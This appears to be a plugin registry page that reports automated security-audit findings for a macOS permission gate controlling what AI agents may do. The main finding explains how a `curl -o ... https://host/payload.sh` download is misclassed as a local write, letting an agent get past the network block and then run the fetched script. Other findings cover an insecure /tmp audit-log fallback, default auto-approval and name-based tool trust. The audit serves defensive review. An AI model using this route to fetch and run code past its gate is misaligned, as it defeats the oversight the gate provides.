What it doesAI
macOS permission gate for DSH agents: rollback-able local writes pass automatically, while network, installs and sensitive reads are blocked and audited.
- Auto-allows reversible local file writes to avoid prompt fatigue
- Blocks network access, installs and sensitive reads by default
- Audits every blocked action with a rollback-able backup trail
Capability tags are AI-inferred or rule-extracted from the README (see badge) — vocabulary-limited, not install-verified. AI = inferred; README = literal keyword from the readme.

Verification & Compatibility
Grouped by plugin version: each card lists the dsh versions actually tested against that artifact version and their install verdicts (L5 wins). Untested combinations are omitted — absence means untested, never assumed compatible. L1–L3 are a plugin-level static archive (independent of the dsh version — the same verdict on every dsh row): they sit in each row's level grid next to L4/L5, marked "static", while their evidence is stored once per plugin inside that row's "checks & evidence" instead of being duplicated per version.
External credentials (plugin-level): none detected

Two automated layers, neither a manual review: a static scan (per-plugin rule checks) and a model-driven dynamic security audit that covers only the subset static-flagged at warn or above and never executes plugin code.
Static low, dynamic medium — stricter wins → overall medium.

- mediumcurl read-only download is reclassified as file_write, bypassing denyNetwork (fetch-then-execute)
lib/classifier.jsWith the default denyNetwork=true, `curl -o <protected-or-temp-path> https://host/payload.sh` never reaches the network branch: it is returned as file_write and allowed whenever the output path is protected (default: process.cwd()) or in /tmp (temp paths are exempt in decide()). The fetched file can then be executed, because plain `bash payload.sh` / `python3 payload.py` classify as local_exec and are allowed; the static-egress scan only runs for local_exec and never inspects the downloaded artifact. The injected system prompt claims 'Any network access: curl, wget ... is BLOCKED', so the guar
- lowAudit log falls back to shared /tmp/.tm-guard without ownership or symlink checks
lib/audit.jsWhen the workspace .tm-guard directory cannot be created (read-only workspace), the audit log, its rotation lock and the turn reports move to the world-writable, predictable path /tmp/.tm-guard. The directory is created with default permissions and neither existsSync nor appendFileSync rejects symlinks, so on a shared machine another local user can pre-create that directory (or an audit.jsonl symlink) and read the audit records — which include the raw tool arguments recorded in index.js (`args,`) and may contain secrets or command text — or cause the appends to be redirected through a symlink
- lowautoApprove defaults to true and auto-answers every approval request with allowed-once
lib/index.jsBy default the plugin removes the human confirmation step for everything that reaches the approval waterfall, on the assumption that the prepended tools/pre-execute hook already classified and allowed the call. That assumption is an ordering property of the host's listener list which the plugin explicitly cannot verify (its own comment says so), so any other permission plugin or host path that registers earlier, or that reaches approval without passing through the prepended hook, gets silently auto-approved. This is documented and warned about at startup, hence low, but it means the gate is th
- lowAny tool name starting with tm_ is unconditionally classified as read and allowed
lib/classifier.jsTool classification is keyed on a name prefix rather than on the registered tool identity, and index.js likewise skips the git/TM rollback net for names starting with `tm_`. Any tool that reaches the gate with a tm_-prefixed name (e.g. registered by another bundle, or a host tool with a coincidental name) is allowed with no path check, no sensitive-read check and no rollback net. Reachability outside this plugin's own tools is limited — other in-process plugins are already trusted native code — so impact is bounded, but the check is a name-based trust decision rather than an identity one.
Defensive permission-gate plugin; static-scan criticals are its own fixed commands and deny-tables, but a curl download exemption weakens denyNetwork and the /tmp audit fallback plus default auto-approve warrant a warning.
Rule: the dynamic audit can only raise risk, never lower it (raise-only, never an exemption); a wrong raise is withdrawn by human review and the tier falls back to the static verdict. Overall verdict = the stricter of the two layers.
Disclaimer: the static scan and the dynamic security audit are both automated analysis, not a security guarantee. Always review what you install.
